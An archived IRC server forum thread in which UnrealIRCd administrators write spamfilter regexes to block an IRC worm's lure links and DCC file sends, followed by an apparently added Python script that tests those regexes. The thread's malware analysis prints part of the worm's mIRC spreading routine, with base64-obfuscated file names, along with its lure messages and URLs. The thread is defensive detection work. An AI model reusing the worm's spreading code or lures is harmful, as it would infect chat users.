some new trojan (from "lycos")

These are old archives. They are kept for historic purposes only.
Tigra

some new trojan (from "lycos")

Post by Tigra » Fri Apr 16, 2004 12:11 pm

Filter for a new trojan that we have on our IRC network:

Code:

spamfilter {
regex "\.lycos\..*/.*server.*/";
target private;
reason "Infected by trojan.";
action gline;
ban-time 1h;

Some private messages from this trojan:
[14:53:49] <tolyan> Fotos XXX http://members.lycos.co.uk/iserver4/playboy.avi XXX Fotos

[14:22:26] <FROL> Free pics Girls, Teens http://mitglied.lycos.de/iserver2/katherine.jpg
[14:22:26] <FROL> Mira la foto -> http://membres.lycos.fr/iserver5/andrea.jpg

[14:26:36] <kolbaserka> Pics Models http://utenti.lycos.it/yserver3/viviana.jpg Models Pics

[14:07:42] <pokoyni4ek> No crees en lo paranormal? http://members.lycos.co.uk/iserver4/hada.gif :|

[12:10:33] <yulia> Mira esta foto http://members.lycos.nl/iserver1/ovni.jpg
[12:10:33] <yulia> Mira la foto -> http://membres.lycos.fr/iserver5/andrea.jpg

Guest

Post by Guest » Fri Apr 16, 2004 12:15 pm

I forgot "};":

Code:

spamfilter {
regex "\.lycos\..*/.*server.*/";
target private;
reason "Infected by trojan.";
action gline;
ban-time 1h;
};

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States

Post by codemastr » Fri Apr 16, 2004 2:14 pm

It's usually best to make the regexp as specific as possible:

regex "http://.+\.lycos\..+/(y|i)server[0-9]/.+\.(jpg|gif|avi)";

Otherwise, you get false positives. Though to get the best regexp, someone would need to open it up and see what URLs are encoded into it.
-- codemastr

Tigra

Post by Tigra » Fri Apr 16, 2004 3:01 pm

codemastr wrote: It's usually best to make the regexp as specific as possible:

regex "http://.+\.lycos\..+/(y|i)server[0-9]/.+\.(jpg|gif|avi)";

Otherwise, you get false positives. Though to get the best regexp, someone would need to open it up and see what URLs are encoded into it.
OK, thank you for your correction.
Does somebody know what this trojan is?

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Fri Apr 16, 2004 3:05 pm

Just played around a bit with the first URL and it looks like (= is recognized as) this: http://securityresponse.symantec.com/av ... gle.d.html

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Fri Apr 16, 2004 3:47 pm

I'll put on some analyses soon ;)

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Fri Apr 16, 2004 4:19 pm

http://www.vulnscan.org/tmp/virus/2004-04-16/

Code:

- sends a dcc on-join
  like:
  DCC SEND C:\WINNT\system32\ManualSeduccion.zip 3232236866 2970 123897
  DCC SEND C:\WINNT\system32\avril.zip 3232236866 3169 123897
  DCC SEND C:\WINNT\system32\images.zip 3232236866 3684 123897
  the C:\WINNT\system32\ thing is HARDcoded [!]
  All possible names (prefixed with C:\WINNT\system32\):
  notes.zip
  videos.zip
  xxx.zip
  ManualSeduccion.zip
  postal.zip
  hechizos.zip
  images.zip
  sex.zip
  avril.zip
  AND <nick>.zip, so dynamic :/.
- privatemsgs with one of the following textstrings on-join:
  4,1Free XXX SexVideo 8,1http://membres.lycos.fr/iserver5/sexescene.avi
  0,13Mira la foto 4,1->8,14 http://membres.lycos.fr/iserver5/andrea.jpg
  5No crees en lo paranormal? 14http://members.lycos.co.uk/iserver4/hada.gif :|
  13,1Britney, Christina, Jennifer, etc 8,1http://utenti.lycos.it/yserver3/britney.avi
  4,1Pics Models 13,1http://utenti.lycos.it/yserver3/viviana.jpg4,1 Models Pics
  7,0Aprende a conquistar al sexo opuesto 13,0 http://mitglied.lycos.de/iserver2/seduccion.txt
  4,8Mira esta foto 8,4http://members.lycos.nl/iserver1/ovni.jpg
  4,1Free pics Girls, Teens 8,1http://mitglied.lycos.de/iserver2/katherine.jpg
  12,0Jenifer Love Hewitt Sex Video 4,0http://members.lycos.nl/iserver1/jeniferlove.avi
- quits with url
  * loser (loser@192.168.5.66) Quit (Quit: mirate esto -> http://members.lycos.co.uk/iserver4/playboy.avi)
  seems to be always the same (?)
URLs are simple to block, quit messages too of course; DCC files are fun because it prefixes them with C:\WINNT\System32\ (see source) [note btw that mIRC/most clients just skip everything up to the last \ so the file shows up as just 'xxx.zip' etc]...
Here's the dcc send routine:

Code:

Alias sv { var %pb = C:\WINNT\system32 $+ $decode(XGZpbGV6aXAuemlw,m)
  if ($exists(%pb) = $false) { halt } | var %rb = $rand(1,10)
  if (%rb = 1) { .copy -o %pb $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(bm90ZXMuemlw,m) }
  elseif (%rb = 2) { .copy -o %pb $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(dmlkZW9zLnppcA==,m) }
  elseif (%rb = 3) { .copy -o %pb $nofile(%pb) $+ $decode(eHh4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(eHh4LnppcA==,m) }
  elseif (%rb = 4) { .copy -o %pb $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(TWFudWFsU2VkdWNjaW9uLnppcA==,m) }
  elseif (%rb = 5) { .copy -o %pb $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(cG9zdGFsLnppcA==,m) }
  elseif (%rb = 6) { .copy -o %pb $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(aGVjaGl6b3Muemlw,m) }
  elseif (%rb = 7) { .copy -o %pb $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(aW1hZ2VzLnppcA==,m) }
  elseif (%rb = 8) { .copy -o %pb $nofile(%pb) $+ $decode(c2V4LnppcA==,m) | Set %bv.file $nofile(%pb) $+ $decode(c2V4LnppcA==,m) }
  elseif (%rb = 9) { .copy -o %pb $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) | Set %bv.file $nofile(%pb) $+ $decode(YXZyaWwuemlw,m) }
  elseif (%rb = 10) { .copy -o %pb $nofile(%pb) $+ $me $+ .zip | Set %bv.file $nofile(%pb) $+ $me $+ .zip }
.ignore -rpcntikxu15 $address($nick,1) | csv $nick %bv.file $chan }
As you can see, that last one is a bit more annoying because it uses $me.
But it can still be recognized by c:\winnt\system32\*.zip; I don't know how many false positives that will have, though.

Anyway.. dinner ;).

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States

Post by codemastr » Fri Apr 16, 2004 4:35 pm

Well, you could make it a little stricter than just C:\winnt\system32\.*\.zip

Meaning, C:\winnt\system32\[][0-9a-z_-{|}`]+\.zip

I don't have the list of all valid nick chars in front of me, but basically that's what I mean: limit it to just the characters that are able to appear in $me. It probably wouldn't reduce false positives by too much, but it might help a bit...

Anyway, to update my filter with the list of files you had,

regex "http://.+\.lycos\..+/(i|y)server[0-9]/[a-z]{4,11}\.(gif|jpg|avi|txt)";

That should pretty much eliminate false positives.
-- codemastr

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Fri Apr 16, 2004 5:13 pm

@url regex: yeah, that looks a bit better than "http://.+\.lycos\..+/[iy]server[0-9]/(sexescene\.avi|andrea\.jpg|hada\.gif|britney\.avi|viviana\.jpg|sed[etc] ;))

As for DCC, another alternative is to use dccblock:
spamfilter {
    regex "C:\\WINNT\\system32\\(notes|videos|xxx|ManualSeduccion|postal|hechizos|images|sex|avril)\.zip";
    target dcc;
    action dccblock;
    reason "Infected by Gaggle worm";
};
That would have almost 0% false positives but wouldn't catch the first DCC block if the random number was '10'; but then again, for 200 joins in an average IRC session it would have a block success rate of like >99% (99.9%?)..

Anyway... I'll probably just stick with the c:\winnt\system32\*.zip thingy (well, similar to what you said), since I don't see why anyone would use that anyway (at least mIRC doesn't send files as stupid as that ;p).

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Fri Apr 16, 2004 5:29 pm

Obvious but even smarter solution, combine them! ;)

Code:

spamfilter {
    regex "C:\\WINNT\\system32\\[][0-9a-z_-{|}`]+\.zip";
    target dcc;
    action block;
    reason "Infected by Gaggle worm?";
};

spamfilter {
    regex "C:\\WINNT\\system32\\(notes|videos|xxx|ManualSeduccion|postal|hechizos|images|sex|avril)\.zip";
    target dcc;
    action dccblock;
    reason "Infected by Gaggle worm";
};

spamfilter {
    regex "http://.+\.lycos\..+/[iy]server[0-9]/[a-z]{4,11}\.(gif|jpg|avi|txt)";
    target { private; quit; };
    action block;
    reason "Infected by Gaggle worm";
};
*edit: added target quit and committed*
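To see what codemastr's tightened URL regex and Syzop's combined DCC/URL filters actually buy over Tigra's first pattern, here is an added example (not code from the thread or from UnrealIRCd) that replays the thread's regexes in Python over the sample messages quoted above plus a few constructed benign lines. It assumes the server's regex engine handles these patterns the same way Python's `re` module does and that matching is case-insensitive.

```python
"""Replay the Gaggle spamfilter regexes from this thread over sample IRC lines."""
import re

# The patterns discussed in the thread, transcribed as Python regexes
# (assumption: the server's regex engine treats them the same way).
FILTERS = {
    # Tigra's first attempt: anything under lycos with 'server' in the path
    "url_loose": r"\.lycos\..*/.*server.*/",
    # codemastr's tightened version, as committed in Syzop's final config
    "url_strict": r"http://.+\.lycos\..+/[iy]server[0-9]/[a-z]{4,11}\.(gif|jpg|avi|txt)",
    # nick-character class for the <nick>.zip variant; the hyphen is escaped so
    # it is a literal rather than a range, and matching is case-insensitive
    # (assumption) because $me may contain capitals
    "dcc_nick": r"C:\\WINNT\\system32\\[\]\[0-9a-z_\-{|}`]+\.zip",
    # the fixed list of nine file names pulled out of the worm's $decode() calls
    "dcc_names": r"C:\\WINNT\\system32\\(notes|videos|xxx|ManualSeduccion|postal|hechizos|images|sex|avril)\.zip",
}
COMPILED = {name: re.compile(p, re.IGNORECASE) for name, p in FILTERS.items()}


def matches(line):
    """Return the set of filter names whose regex fires on this line."""
    return {name for name, rx in COMPILED.items() if rx.search(line)}


# Sample traffic: the first four lines are taken from the thread, the rest
# are constructed (one $me-style DCC and three legitimate-looking lines).
SAMPLES = [
    "Fotos XXX http://members.lycos.co.uk/iserver4/playboy.avi XXX Fotos",
    "No crees en lo paranormal? http://members.lycos.co.uk/iserver4/hada.gif :|",
    "Quit: mirate esto -> http://members.lycos.co.uk/iserver4/playboy.avi",
    r"DCC SEND C:\WINNT\system32\avril.zip 3232236866 3169 123897",
    r"DCC SEND C:\WINNT\system32\Tigra.zip 3232236866 3169 123897",  # constructed, $me variant
    "my homepage is http://members.lycos.co.uk/myserver/index.html",  # constructed, benign
    "DCC SEND holiday.zip 3232236866 2970 123897",                     # constructed, benign
    "hello, how are you?",                                             # constructed, benign
]


def false_positives(filter_name, benign):
    """Count benign lines a single filter would have hit."""
    return sum(1 for line in benign if filter_name in matches(line))


if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(matches(line)) or "-", line)
    benign = SAMPLES[5:]
    print("url_loose false positives:", false_positives("url_loose", benign))
    print("url_strict false positives:", false_positives("url_strict", benign))
```

The loose pattern hits the constructed "myserver" homepage line while the strict one does not, and the nick-class DCC filter is the only one that catches the $me-named archive.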
